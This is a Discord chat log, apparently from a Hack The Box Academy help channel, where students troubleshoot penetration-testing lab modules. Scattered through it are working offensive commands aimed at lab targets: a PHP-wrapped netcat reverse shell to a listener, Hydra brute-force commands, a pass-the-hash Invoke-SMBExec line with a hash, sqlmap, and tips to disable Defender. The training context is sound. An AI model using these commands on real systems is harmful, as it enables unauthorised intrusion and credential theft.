#modules
hack
with what
Got it :)! The issue I was facing was the HTB academy not elaborating which command is run where so I was trying to forward remote ports on wrong server 😦 But thanks for the help. Scanning is still a pain in the but, I'm not sure what a good scanning strategy is
anything
ok
Keep coding, I would recommend youtubing some stuff before here
I use online gdb rn
Oh sheet you're next level
on school chromebook and linux is blocked
chromebooks use linux kernel
bro I said I dont know how to code that much
I should have an affiliate link

ok
now ill just gmail myself later
is there a way I could invite the @compact patrol bot into my server?
They open sourced it. Check #📣-announcements
I know like how do you do it without code
im on 5min
50min*
right now
lol
i used|| hydra -L username.list -P password.list ftp://ip ||
Hello, I'm currently on the "ATTACKING COMMON SERVICES - Attacking FTP" module and there is a question "What port is the FTP service running on?". When I run nmap there is no FTP server running on the machine. Am I missing something?
if i recall, either you must reset the machine and/or check all ports
I know. ssh can run sftp so I tried it as the answer.
I restarted the machine and I have the same result. I already checked all ports with the -p- option.
Reset the machine again
Give it a few minutes and try, if that doesn't work => reset
you need to do a service scan
Nmap checks a text file to determine which ports are usually running on these ports
and displays them
With a service/version scan, Nmap sends various requests to determine the service
so you could do this:
nmap -p22,53,139,445 -sV 10.129.203.6
but maybe something is wrong with the machine too, it seems weird that it would try to "trick" you like that in a learning module but idk
I haven't done the module
i reviewed my notes for this one, this one is a reset and check all ports issue. a bit annoying.
I had the same issue yesterday and I restarted the machine several times. Here is the result from the service/version scan.
ohh okay then yeah seems to be something wrong with the machine then
What now? I should write to the support? Or the support is periodically checking discord?
ask @cunning prairie
this ^
you may have to reset several more times. the answer is not always a default port.
Thank you guys. I restarted the machine several times and now it works. ❤️
just pay it forward.
can someone help me with this? i've been told this is the right thing im doing
but i waited for it to go to the end and nothing got cracked...
its password attacks easy lab
Command looks good. You might want to use -t to speed up the process.
If you ran through everything without success, redownload the lists and try again. Also make sure you don't have any connection issues
what -t value should i use?
I used 64. That's a bit brutal but seemed to work
@naive field said they waited until the end and nothing got cracked so I don't see any reason to use -t
to speed things up
Are you sure the username is correct @naive field ?
im trying it just to make sure
i put the username list
let me see the command
.
this one
well it seems the credentials are not in that wordlist
neither user nor password?
i got it from resources
what resources
provided in the module
so strange
idk
🤷
i swear every section i need to f-up something
especially this pw attack module
i mean the command you're using is definitely correct
and if it gave you that those wordlists.. then i would definitely expect the credentials to be there
perhaps it's something wrong with the machine ?
idk maybe reach out to support, it seems like it's a problem with the machine
Lists should be alright. The number of attempts matches my notes
if they gave you the wordlist, then it should be in there
i have no idea...
That'd be my guess too at this point
I'll rerun the command and see if I run into similar issues. Maybe I can figure out what's wrong here
that'd be great if u have some spare time
Command is running. We'll see
anything cracked?
Mine is running at not even half your speed so it's not done yet
oh gotchya, mb
i realised mine is the slowest since its on pwnbox :D
Would be interesting to know why yours is that much faster though. I have no clue
Ah okay pwnbox being faster than VPN does make sense
Yep. It cracked it
It says that 62 threads didn't complete. There's a chance one of them is the one you're looking for
Not the problem here
it's always like that idk how to fix it
In general, yes, but I've been doing the exact same thing without issues.
even when i dont use -t for more stability same sh*t
I didn't run into that issue yet so dunno how to fix it. Maybe google has some quick fixes to offer?
i did
almost nothing tbh
Hi guys i am doing the module shells and payloads but i am stuck on this question. I found that i have to use the 50064.rb exploit with msfconsole but when i run the exploit i receive an error
This error
The settings that i used are these :
from i can get a good wifi adapter
you're on the right track. take another look at the vhost. vhosts should be in a different format (check /etc/hosts if you don't know what I mean)
Set vhost now : blog.inlanefreight.local but same error
I Change the targeturi in / and after the run command i have some new errors now.. something is moving
May be wrong payload set in msfconsole?
this channel is for help w/ HTB modules, you would be better off giving introductions in #general
pretty sure I didn't touch the payload. so if that's default it should be fine

Anyone finished the Footprinting module DNS section? I need to understand a couple of things that I don't believe I understood properly. Please let me know so I can dm
Depending on what the questions are I might be able to help. You can dm me
.
great thanks man ... give me like 10 min to dm you
Hi all, I am having little technical issue in connecting to the target machine machine over ssh. I can ping the target machine but i cannot ssh it. I see 22 is open but i dont get the connection . However when i try to ssh same target from pwnbox i get the yes/no question for connection and get log in to target. can some one assist what could b wrong?
Are you connected to pwnbox and vpn?
Which module and section?
Yep !
i saw pwnbox and vpn has same ip addresses so i terminated it. but still not working.
getting same error again and again after some time.
From which module and section is the target that you've spawned
I can ping though.
Maybe try restarting the target and only have EITHER pwnbox or VPN on
Reset the target. and did the ssh again same error received.
pwnbox is already disconnected a while ago.
Did you use the new IP? Because it looks like you used the old one
target happens to spawn with the same ip again and again.
Try refreshing the webpage
see the ping drops and reappearance
And see if the IP changes
let me do this now.
did this 4 times . same IP everytime. One more thing this problem came in from 2 days back when i tried to connect to the htb season labs vpn and disconnected it. I also tried downloading the new version of openvpn config file 3 times but same issue.
Mhh. Only thing I can think of now is contacting support
yes still searching
@sick mural
is there anyway to read a file with smbclient?
Yes
Get-GPPpassword.ps1 didn't fetch anything
Thanks for assistance. Working to get support guy online.
Hi, i am doing the module Windows Attacks & Defense. I just did the first Kerberoasting Attack, and now I need to get the ServiceSid of the user webservice. I think i did find it but the answer is wrong. Can someone help me plz ?
This is the correct one
I've recently done it, few mins ago
for the cracking passwords with hashcat module the Cracking Wireless (WPA/WPA2) Handshakes with Hashcat, Is the hash not loading supposed to be part of it? I copied everything verbatim from the examples and when i go to run my .hccapx through hashcat it says no hash loaded. But it seems like it converted fine when i did my ./cap2hccapx.bin corp_capture1-01.cap mic_to_crack.hccapx.
Hi, ok thx, but the app says it's wrong. The hint says i need to check both general and details, but i didn't find any relevant information in general
That data can be fetched from details tab only, that you've already done
Please copy paste it, and check whitespaces
Clever X). yeah there was a space at the beginning
Thx
MrR3boot
Hello there i think something wrong with connecting to academy ovpn
Why, it looks normal to me
Yea that is what mine always looks like ^^^
Why is it that the active subdomain enumeration section of the information gathering module gives me a command that is not working?
the "nslookup -type=NS zonetransfer.me" keeps giving me this:
Server: 192.168.189.2
Address: 192.168.189.2#53
** server can't find inlanefreight.htb: NXDOMAIN
You are querying the nameserver of zonetransfer.me but error message says inlanefreight.htb can't be found?
Something is not right at all.
Please make a printscreen
My bad, the query is for "inlanefreight.htb"
I just copied the command from the module
Idk why it won't let me add a screenshot rn
I don't know why i can't render the module IP in browser but when i curl it its fine !!
Are you verified? #welcome
htb is not an official TLD. This means that the root nameservers cannot resolve this TLD.
So you have to specify a nameserver in your request, which has the corresponding zonefile.
dig NS inlanefreight.htb @NameServerIP(Target from Module)
nslookup -type=NS inlanefreight.htb NameServerIP(Target from Module)
Thats it, thank you!
Hey guys, I'm stuck at module footprinting - DNS. the 4th exercise just make me die!! Tried almost all wordlists from seclist. I can't figure out what I'm doing wrong. Any advice?
Host 203? You need to find all zones
Hi, i'm doing the Login Brute Forcing with Hydra,
on skill assesment: Website second question:
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
anyone has an hint for solve?
i have tried
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 206.189.124.101 -s 32341 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"
have you checked the source code to see what is used in the form?
yes bro , can i dm you ?
sure
For some reason I am finding this section impossible(Active subdomain enumeration), can I dm someone to clarify and ask a question?
Sure
getting this error while importing the private key in attacking authentication mechanisms:
nvm got it
I can curl webserver and ping IP but can't see it on the web browser
so i was on the internet investigating and found this, could anyone help me
Hi, I'm new here. Hope to learn lots.
Welcome @livid steeple
This isn't the place for introductions
This is for asking questions related to the modules found at https://academy.hackthebox.com
Module shells and payload : after run the 50064.rb exploit i receive this error.. i am going crazy.
It's always nice to say hello. Thank you for letting me know. I have questions regarding the machines, I hope this is the right place to ask.
if it's regarding the starting-point machines or boxes on the main app.hackthebox.com site, please follow instructions in #welcome
Mild change is that it's /verify not ++
AD enum & attacks, Misc misconfiguration, how do i ssh in via powershell? i tried ssh htb-student@ip, it asked me for a password, i entered the password provided by the module in the beginning when it says i might need to ssh and explains how to but it keeps rejecting the password, i tried resetting the lab multiple times
I am struggling to find the txt record, in the information gathering web edition - active subdomain enumeration section
I am trying everything in the module, but I believe I am missing something important
the module is really unhelpful here, the Footprinting module has a DNS section, try the stuff shown there. tell me if u want me to point u to a direction
Ok, thanks Ill look at that now
Just solved the remaining 4 questions instantly lol
that was so easy with the notes I took from the footprinting module
thanks
any time man
hey guys
when i want create a virtualenv with python2 to use tplmap tool i get an error (im in server-side module )
anybody is here to help me?
Is this related to an academy module?
what is the error
solved
tnx
any1 do the osint module ?
Hint: Inspect
Or use: *** is the leading solution to find and verify professional email addresses
it is easier than you think, don't overcomplicate it
oh lmfao
ok but i wonder why intext:"@inlanefreight.com" didn't pick that up
with "jeremy"
has anyone thats done the server side attacks assessment available for assistance?
try this one
hope u get it xd
i don't but i solved it so it is what it is
lmfao
not a bad module
i woulda liked to see a linkedin page and some fake employees to track down
that woulda been a bit more interesting
ex-employees
some waybackmachine maybe
but overall it was neat
if i finish a module and it is later updated, do i need to purchase it to do the new content, or will i have access to it?
someone can help me in the module: attacking common services - Section: sql databases
If you bought a module, it is yours and you get updates for free
same if I got it through business?
i have enumerated all the database and logged in as well in the other ports and i couldnt find nothing
no idea
can't recall, sry
np
Do you have the correct user? ***svc
i didnt find the password/hash
am using mssqlclient
||Responder|| is your friend
Can someone please help me 😭
For all requests that start like this, the answer is usually no
What is the issue?
I may be overlooking something in the virtual hosts section of information gathering web edition, but what is "./vhosts" referring to?
Someone took my Instagram and Snapchat account
lol this isnt the place for that
Contact Instagram and Snapchat support
How
you can google instagram or snapchat and after it put "support"
This?
cat ./vhosts
in this case vhosts is a file
yes
i think i have it now, is this where the path to my wordlist goes?
Is there a place I can put feedback for something to add to a module ?
For the serverside assessment, i found the attack surface and am able to read files. i was able to read the /etc/passwd and /etc/shadow files but i cant seem to find the flag.txt. i have a feeling they changed the name of it for this assessment but i cant seem to find it. any hints?
erratum would be a start
Ok, I got it now. I thought the ./ was calling a script or sm that I wasn't seeing
Hello, everyone.
I am stuck "Password Attacks Lab - Hard"...
I cracked B**.v**'s password.
Could you please DM ok?
In the context of using files, ./ Indicates to most programs that you want to use the current directory
I'm currently working on this module: https://academy.hackthebox.com/module/112/section/1067
I'm on one of the questions and I know I have to use rpcclient for it but, I'm unable to do?
I've tried switching the VPNs and on PwnBox but I'm still not able to interact with the RPC
Am I performing something wrong or it's a platform issue?
Is that the IP the spawn target gave you?
Also please just say module and section name
SMB
Footprinting?
Kk you've done the other parts up to this point yes?
The other parts, you mean in this particular section right?
SMB
Then yes
The ones before were FTP and the ones before that is Footprinting/OSINT stuff
Can you ping the address?
^
Yup
is the 445 port open?
In fact I'm able to enumerate shares on it too, which is related to the same section
I see the RPC port open on 111 but
and connecting again
Maybe try adding the -N option before the ip for no-pass
give it a moment
-N doesn't matter for the -U "" option
because you're telling RPC that you're connecting with a null session
It just won't prompt you for a password
I've tried resetting too. But giving it a moment- I haven't done that
Let me do that
@misty current do you have a space between your quotes?
hard to tell sometimes in cmd line
cool but yeah try giving it like a minute after spawn
Sure
I was able to connect to it just fine :)
Also the issue wasn't that it was a password issue, it was a windows related error saying the service doesn't exist
Hey! Anyone interested in helping a noob?
I have just started from zero and unlocked the module: Windows fundamentals, and already stuck in the first question *( "What is the Build Number of the target workstation?" I am supposed to use the instance provided by HTB, but when I write the given code, it doesn't work! what am I doing wrong?
Ah, how did you workaround that?
Were you able to connect?
You don't need a password
I didn't get any prompts for passwords tho
I know, I was just exploring options they could try
did you specify any ports? @fathom pendant
No
Try using a different VPN connection
Or switch from tcp to UDP or vice versa
which region do you have yours set to?
Us academy 1
@fathom pendant I am using the interactive instance, not my windows. this is what it looks like:
You can't post screenshot
You need to verify your app.hackthebox.com account via instructions in #welcome
There is a spawn target button yes? And it gives you credentials to how to rdp in?
Yes, there is
Did that
Ok so what are you having trouble with exactly
Using rdp to connect to the IP?
Because the interactive pwnbox is NOT the target
No luck with the region switch either.
Interesting
I supposed I'll have to try this module some other day
And you reset target after switching regions (make sure you redownload the VPN config, end the current openvpn and start a new one)
For Windows Priv Esc Assessment II is this normal behavior after I complete the exploit. I have the last flag from using the meterpretershell, but can't keep it stable enough to get the second.
meterpreter > net user administrator password
[-] Unknown command: net
meterpreter > shell
Process 836 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18363.592]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>net user administrator password
Terminate channel 1? [y/N] y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter >
I'm making sure to download a new VPN everytime lol
Lol you don't need a new VPN every time
I've been pushed to resort to this xD
¯\_(ツ)_/¯
This is the code to connect to target: xfreerdp /v:<10.129.68.64> /u:htb-student /p:Academy_WinFun!
I get an Error when I type this in the Parrot terminal
I'd contact support on the site then since it looks like a weird issue
Put the password in single quotes
same error
Yup, I'll definitely raise this to support team if it's still the same when I try it after 2 days. It's working for you so.. I'll try another time in a day
I'll have to skip this for now.
Thanks anyways @fathom pendant
someone know how to log in with a hash in mssql?
Oh I see the issue now, take out the left/right brackets
you have to crack the hash
i got it
but i cannot log in with the password
and i have read in the forum that i need to log in with the hash
Wow it worked, now how do I find the Build number from the target workstation?
You can login like this
|| $sqsh -S 10.129.103.4 -U WIN-02\mssqlsvc -P 'yourpasswordhere' -h||
why i couldnt get it with mssqlclient.py
I linked an article earlier
can someone please help... this is for the session hijacking module.. not sure on what part im supposed to put the actual IP in the index.php file for this. "Victim IP: {$_SERVER['REMOTE_ADDR']}
3rd question in this module
windows attacks and defense, the problem is that, after attempting to log into DC1 with the said credentials, and checking in the Event Viewer in DC1, there's no activity registered on the username bonni
Module name and question?
so I tried to log into it multiple times, as it was supposed to fail,
That's the new one yea?
indeed, been a while, maybe a week or so
I checked each one of Event ID 4771, manually, none of them had bonni username
Is that the eid it's looking for?
yup, the hint suggested it + even without the EID, looking for just the username bonni doesn't yield a thing
183,402 EIDs logged, no less
and I have switched back and forth 3 times ig, no changes
logging off now
Gotcha interesting if I ever run this
Figure it out?
anyone finish this question from PrintSpooler & NTLM Relaying? Windows Attacks and Defense, I keep getting this error when running dementor
In the Attacking Common Applications module did anyone else have trouble getting the Metasploit modules to work on the Jenkins and Tomcat targets? I've tried the suggested exploits and I just get the "Exploit completed but no session was created" result.
a pretty common problem
Ok, I know they're kind of fiddly/unstable. I'll just go on. Thanks!
i need some help the dns section of the footprinting module
i know what subdomain to brute force
but every time i try brute force the query times out
this is for the What is the FQDN of the host where the last octet ends with "x.x.x.203"? btw
what are your commands?
dnsenum --dnsserver 10.129.236.33 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt --threads 90 dev1.inlanefreight.htb
is this dev ip in your /etc/hosts
wdym
So we are not allowed at all to ask for help on active machines? like MonitorsTwo. Is it just waiting for a walkthrough to comeout my best option?
you are not allowed to ask anything about any machines
this is for academy modules only
ok. thanks
no
There's a channel for monitorstwo
I am guessing if it is time out your machine doesnt know where to look
And a forum post.
ive managed to get a response but the subdomain doesnt have the x.x.x.203
if you already knew the subdomain you wouldnt have had to look it up
so youre very likely fundamentally misunderstanding the question
is the subdomain not dev.inlanefreight.htb?
if it is then you ought to have the FQDN already
im so lost
whats a FQDN
cuz i cant do dig axfr on that
It doesn't need to be in etc hosts
For dnsenum
fully qualified domain name
Dnsenum brutes it
the return dns
cool so whats the format of a FQDN
yeah it was dev
And section
i pasted the wrong input
www.subdomain?
will do
did i atleast get the subdomain right
That spoils it if we just tell you :) but the answer will be in the form of a.b.inlanefreight.htb
ok thanks for the help
it's not so difficult just read the material
So it's not digging too hard into it
its 2 in the morning for me man
running on no sleep
If you're struggling then best advice is to walk away and come back later
You shouldn't generally be struggling super hard as you've got the info almost all correct. But definitely double check all of the more fierce hostlists in the seclist directory
I know this is old but I think I know why you can't access Admins stuff and what you need to do in order to achieve that. If you wanna chat about it, hit me up.
Dude that was like a month ago. If they haven't solved it by now they have bigger problems lol
I know lol but I was trying to figure out why and figured it out myself. Now I must share the glory.
Lol yeah responding to messages 1+ month ago most people are gonna be confused
im tryn
In general, if it's 1+ week it's almost never worth replying lol
tell me how, a similar thing happened to me today
I added a user to admin group then created another user and added it to the admin group. Both didnt work at all. they were in the admin group alright but couldnt access to admin desktop.
disconnecting and restarting didnt work either
Yeah I had figured it out
Windows attacks and defense needs some attention
😮‍💨
guys im doing linux fundamentals I need some help lol
Hello guys in the section RDP and SOCKS Tunneling with SocksOverRDP I'm trying to load SocksOverRDP.dll but Windows says operation not permitted, I already checked the antivirus and firewall but all is turned on, how should I do ?
disable defender
windows defender firewall ? already off
make sure also that you are using an elevated prompt
yes I do
More information required
Hello world, I'm on Documentation & Reporting module and Documentation & Reporting Practice Lab, I don't find command injection where is for report. Need a hint, thanks
im trying to find what the path is the htb students mail
Msg the exact question and what you've tried already
that's rlly strange
and ive connected into the ssh so im in the machine
Module: Pivoting
Section: Skill Assessment
Question: 5th "In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?"
Hint: We may be able to find something stored in LSASS.
I have been in this question for days after getting the RDP of m*** user. Any help or hints to move forward would be appreciated
this ?
Follow these steps to temporarily turn off Defender antivirus protection in Windows Security. Keep in mind that if you do, your device may be vulnerable to threats.
works thanks you
this section is really horrible with RDP sessions in RDP sessions with file transfers bruh
What is the method to download from Sysinternals? I can't access the internet from the spawned windows session.
okey okey
hello
i need one help
can we get ip address through phone number or any social media account?
i have tried soo many ways but it was useless
if someone can help
its showing no access
Idk maybe you were banned ask the mods
but i havent done anything
Ask mods
Who can I pm regarding the following module: https://academy.hackthebox.com/module/113/section/2164?
are you mod sir?
No
ok
Hello, do you have any luck with these? I have the same issue. Thank you.
Hey guys,
am stuck at SMB enumeration
the question is simple and IDK what am not getting
What is the full system path of that specific share?
do you have a command prompt on the machine
okay,
Hi trying to figure out how to find the admin email in the Footprinting module imap/pop3 section. I logged in as it said in the section, but I can't find any way to find what users the service have... the ID command just gives the same results no matter what I wass, and the list "" * just give me directories... I went over the section again and again trying to find how to do it. but I didn't.
What command are you using to list the shares?
am using rpcclient to list the shares netshareenumall
i can see the path, but the answer is wrong
it is expecting a linux path
what is the path?
C:\home\sambauser\
noo xD
I know it is linux
BUTTT
My question is that why would rpcclient reveal a wrong path?
?
Welp, have you ever used WSL?
what do you mean
Am not sure what i mean xD
But umm i tried entering /home/sambauser/
as an answer, it didnt take it
have you tried entering the path that is shown in the output of netshareenumall?
yupp thats what netshareenumall shows C:\home\sambauser\
hi, can anyone help me for this question? What is the FQDN of the host where the last octet ends with "x.x.x.203"?
paste the full output
try to do nslookup with that ip
what ip? i dont know that ip yet
netname: sambashare
remark: InFreight SMB v3.1
path: C:\home\sambauser
password:
Guys what is the benefits in VIP+ subscription
Because I plan to do some Course in some Institute and also I have plan to get VIP+ in htb to learn hacking so I am confused to do because I am poor in money..
Guys any one have idea pls guide me ...
Which will be great decision?
I tried to login to the share sambashare , just got the flag but no clue about the path
You have to find all zones
btw I still have no thread how to find the admin email 😦
i found 2 zone, inlane and internal.inlane
but got stuck with this
nvm
and both do not include the host you are looking for. Means there is one more zone
did u try /home/sambauser/
i understand, and getting stuck with that
:))
yup i did
include ip?
Remember that not all servers allow zonetransfer from everyone
How do you know it's talking about the sambashare share?
so any recommend to do with that?
from the previous question*
hmmm
the previous question mentioned that it is talking about samba
Guys what is the benefits in VIP+ subscription
Because I plan to do some Course in some Institute and also I have plan to get VIP+ in htb to learn hacking so I am confused to do because I am poor in money..
Guys any one have idea pls guide me ...
Which will be great decision?
did you try /home/sambauser without the / at the end
that worked?
yeah xD
I solved the issue. I made a payload with msfvenom and uploaded and then got a rev shell. Thanks anyway.
you should take one, bc you will have a virtual machine for learning, or via vpn
Lol
Hello?
thanks buddy!
@vocal coral OK then I don't want to go for any institute right
you're logged into a POP3 server?
I can... but I don't think there is a way to list emails there?
you will need cube to pay for course, so if i dont take vip+, you will not have cube
sr, can i DM you?
hi, im doing the windows privilege escalation module and im stuck at a part where i need to do uacbypass to get elevated shell, tried a couple of techniques and it didnt worked, can someone pm me?
sure
hi guys i am having trouble with this:
windows priv escalation:
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.
basically i am putting the malicious file in the shared folder in c:\ but sccm_scv user wont access the folder so i am stuck
still struggling with this... i am only able to get htb-student hash and not user SCCM_SCV ..
what if you type LIST
0 messages
spoiler
@vocal coral yes I know that but am asking that HTB or offline institute will be right place to learn from 0 to pro?
what if u do STAT
The Academy is certainly a good start to learn hacking
or the imap one
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
it must be in the imap one then
cuz it seems like the POP3 is empty
I gtg be right in like 1h
@acoustic owl okay
shopping for the weekend
swag
It's going to be on IMAP not pop3
Also https://www.atmail.com/blog/imap-101-manual-imap-sessions/
https://www.atmail.com/blog/imap-commands/
Really helpful links
Hey! need some tips. module "getting started" - Knowledge check. i'm able to print the id with "<?php system ('id'); ?> when i set up a nc listener and run <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?> nothing happens, tried a couple of other shells with same result. any tips?
I usually do <?php echo system($_GET['cmd']);?>
and then use the Python3 #2 reverse shell from https://www.revshells.com/
and then visit http://<ip>/<page>.php?cmd=<revshell command>
I'll try, thanks
Hi, In File transfers->Miscellaneous File Transfer Methods . one has to practice transfering files via nc from attack > to victim. but victim machine (windows machine) dont have nc installed on it. also if you try to download , it tips the AV which deletes the executable file. Any idea how to use nc on windows box?
Hello can someone help me in this question:
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
This question is in public exploits
What are the steps to do it?!
Well first you visit the IP:port it gives you
Second you use the msfconsole or searchsploit as suggested to exploit the vulnerability of the specific plugin
I did them but i cannot reach the flag.txt
Well in the exploit you should be able to change the filepath
Which one of the exploits should i use there is a big list of exploits for wordpress
Well you're looking up the wrong thing then
Hint: it's the plugin being used
They're even nice enough to tell you the version it's running
I searched for this one and it did not work
I found an exploit for wordpress plugin 2.7.10 but it also did not work
It does not give me what i need
One moment
same issue, id, pwn etc works fine, but cmd='revshell' don't wanna give me any juice
It should be the file_read exploit if you search for <plugin name> 2.7.10
(note file_read is only part of the full msfconsole exploit name you use)
try base64 encoded ones
Guys what is personal instance in server
hi guys I am in the SQL Injection Skills Assessment. 'Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.' Can someone give me a hint on how can i approach this?
first try to identify a valid injection point @urban anvil
thank you for the hint
Personal instance means that it's yours, no one else can touch it
Just apply what you have learned during the module
how do I get nessus working during the skills assessment in the pwnbox? It's giving me an error when I try to start it.
What error? Also the skill assessment uses a jumpbox iirc so you don't have to wait for results
sup
still need help?
when I try to navigate to it in firefox it is not showing up as valid, and if I try to connect via rdp it also does not allow me to connect
what is the output of sudo iptables -L and sudo ufw status ?
on your local host
Okay thank you!
So it doesn't allow you to rdp to the spawned 10.x.x.x or navigate to the IP:8834?
nope
What is your rdp command?
it says the connection has timed out
on firefox
xfreerdp /u:htb-student /p:'HTB_@cademy_student!' /v:10.129.201.248
its slow but it is responding
the module says you're supposed to RDP into the box?
ah finally it worked
It's recommended because manually running the scans can take a good hour
Idk regarding pwnbox if it's running by default
PTH module guys, i don't get the rev shell at all. i am running nc as admin and running rev from Julio's powershell.exe prompt. please, any hint? i have tried different ports
you don't need to run nc as sudo if that's what you mean by admin
yeah, i just "run as administrator"
windows has netcat?
oh
what is the command you're using to run the netcat listener
hi all , i am currently working on the module "attacking common services" i am stuck with an issue on the questions about the ftp service . What port is the FTP service running on? . but when i scan the ip there is no ftp service running. there are other services though. someone had the same issue ?
nc.exe -lnvp
no port?
nc.exe -lnvp 443
what's the command you're using for the rev shell
Still stuck at this so bringing it up once again
yeah, i have tried both. on admin powershell and on pth shell. none of them work. this lab must be broken
invoke-smbexec
Which creds do you have?
who should i report this lab/ it is broken for sure
And you're running the invoke from the tools directory? iirc you need to be in that directory and import that module but I could be mistaken
What module is this?
i am doing things right. yes, i am importin-module invoke-smbexec....
the commands are being executed, but no reverse shell at all
import-module*
Interesting and you're following the examples (changing IP where appropriate)
Also by module I meant academy module
yeah, that's my invoke-smbexec command: Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command " powershell -e Base6shellcode"
I had some trouble with this the other day, which prompt on revshell are you using?
Are you using powershell #3 and selecting Base64 from the drop down menu or the one titled powershell #3 (base 64)?
powershell #3 (base 64)
That's the one that worked for me, did you try wmiexec?
yeah i tried both
i will try the one that worked for you. it might be something with the base64
one sec
Yeah I'd try a few more of the shell commands, make sure the module is importing correctly as well, it's almost always something dumb being overlooked
At least for me
what port did you use?
I used 9000 something
Dm me some screenshots of your terminal?
sure
done
Hi there, I need some help/assistance on the bypassing Web Application Protections - case 9 and case 11?
I tried the following but it didn't work. I think I understand something wrong.
case 9,
sqlmap -u "http://206.189.114.209:30142/case9.php?id=1*&uid=1842984375" --randomize=uid --batch -v 5 --tables --dump | grep URI
case 11, I tried a bunch of others, all of them don't seem to work.
sqlmap -u "http://165.227.225.180:32243/case11.php" --data="id=1" --tamper=apostrophemask,greater --batch --tables
Thank you…
It looks like you're missing a closing double quote
I am stuck with the command injection chapter > Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found, I think I'm almost there but can I share through dm the command what I'm doing? appreciate your help
start with a simple command, and then build on top of it
I am working through a test via HTB and the vms can only handle 1 request at a time before the VM fails and needs to be restarted. Is there a fix for this?
Elaborate what you're referring to "test"
It's an onboarding test.
Which is fine, but I feel like something is misconfigured because I have reset the vm after each request
That doesn't help us figure out what you're talking about
You may need to reach out to support on the site
https://help.hackthebox.com/ make sure you have Adblock disabled
thanks!
Is it related to an academy module?
I'm not sure exactly. HTB hosts their onboarding technical tests.
they call it a "lab assessment"
Hey has anyone recently completed "Attacking Common Service" SMB section? Think I mightve missed something as far as password attacking the service for one of the users
<@&861185840277487616> ? Is this allowed
What's the issue you're having? (Iirc this one you can follow the examples pretty closely)
Also this lab does have a user and PW list to download
Well the module itself
Is the answer not in the section?
The footprinting section tells you it'll be on an IMAP server
:)
I also provided links below that to some useful IMAP commands to grab and read the email
Because if you don't do a specific one (or ones) all you'll get is "nil" in a bunch of places
Thanks again!
I redid this module challenging myself to only use CMD line and not a GUI client
I figured it will be on the imap because pop3 can only send receive and delete... very little querying available (besides list and stat maybe..)
Sometimes pop3 may have something
Well yea. still... What is the logical follow through from the section to solve the question?
Sign in with the given credentials on IMAP
yeah I downloaded the pw list from a previous section, but cme didnt pop for the user in question with that pw list
Use IMAP enumeration
I have
Iirc this hash can actually be cracked with rockyou if you're on that portion
wdym?
Use IMAP commands to find the answer from the footprinting IMAP/pop3 section :)
They gave you some starter commands
But the one that they give you for reading an email isn't quite correct
? You're given the username/password to login with
yes
I have logged in
but that isn't the answer... I assume I need to find a diff email
so... it will be something like poor_admin@inlanefreight.htb
Oh wait.. I see the select command
lemme fizzle with it
No it's that email like I said though: #modules message these links will be more helpful
You are magnificent
This would be considered a spoiler
Can I DM?
ahhh so we aren't trying to brute the SMB login here? We using a tool further down in the section that's forbidden on the OSCP?
Ok so it says there is 1 existing in || DEV.DEPARTMENT.INT || but I see no way to list email ID's?
Well... If there's 1 wouldn't it make sense for it to be the first one?
IDs aren't some complex thing :D
I tried 1 and 2...
DM me what you got for fetching 1
wait it gave me something now...
odd
I'mma try on my own but something is funky with this
got it
huh
I take it you hit the "nil" part
Take a look at the links I posted earlier
I rather stick to the section... there will be enough time for exploring on my own later with boxes and stuff.
unless the answer is not in the section?
It's not I checked and just posted an erratum because MANY people get stuck
And move to using an email client instead
I see... that's a big oof then
Yeah the fetch all command really doesn't do much for you
Guys whenever i try to ping the machines I can't seem to get a connection. But any Starting point machine i have no issue connecting to. I am using VIP+ as well so not sure why nothing is working when i am paying 20 USD. Any help?
are you using your vip vpn config file to connect? because starting-point, regular, and academy vpns are all different
I found the flag... adding 1 or 2 paragraphs to the section would have saved me 20m
or just providing the useful command in the imap commands part to begin with :D
I am using the Seasonal which automatically also connects the machine one. Whenever i spawn the target and try to ping it's IP address it doesn't ping it
seasonal is separate as well
or just change the FETCH command listing to || 1 fetch <id> <email_format>
but again this is NOT the place to ask
Do you recommend I use Pwnbox better?
refer to #welcome on how to verify your account to have access to more parts of the server
this channel is for discussing the modules found at https://academy.hackthebox.com
most emails are in the rfc822 format as that's the standard
Cool if I dm ya @fathom pendant ?
sorry bouncing back and forth, but you should be able to enum the share with a Null session and use the R* tool to capture the hash
i don't recall needing to enum a user for that section but I'm also slowly updating notes and moving forward with other modules
Ahhh gotcha sorry I'm dense
All good if you do get stuck go ahead and DM me just ping me here when you do I don't get blind DM pings
The Attacking Common Services module I would say is one of the ones you can mostly follow examples with a few tweaks
yeah I'm thinking my R* might not be working right because I've got it running but no inbound cnx
Just follow the steps directly
Can someone assist me in the Active Subdomain Enumeration module and finding the NS? I tried all the tools in the section but not getting it.
is it possible to speed up medusa for ftp cracking?
its taking hella long
like 5sec per one try
and i have to crack user nd pw
on attacking common services ftp
now its like every 20sec
lol
I just use hydra with -t 48
But tbh hydra does something similar it basically doubles the time each time it spits out progress
you may need to reduce the threads then
how much?
I am redoing all of the enumeration, footprinting, and information gathering modules and taking notes on all of the exercises/skill assessments currently. As I am going through the Nmap module, I am wondering when you would use NSE in a situation outside of the module/the real world? Is it used throughout the exam?
"45 targets did not resolve" means you were sending packets out faster than it could take them
i tend to go in multiples of 16 when adjusting
so should i try like 32
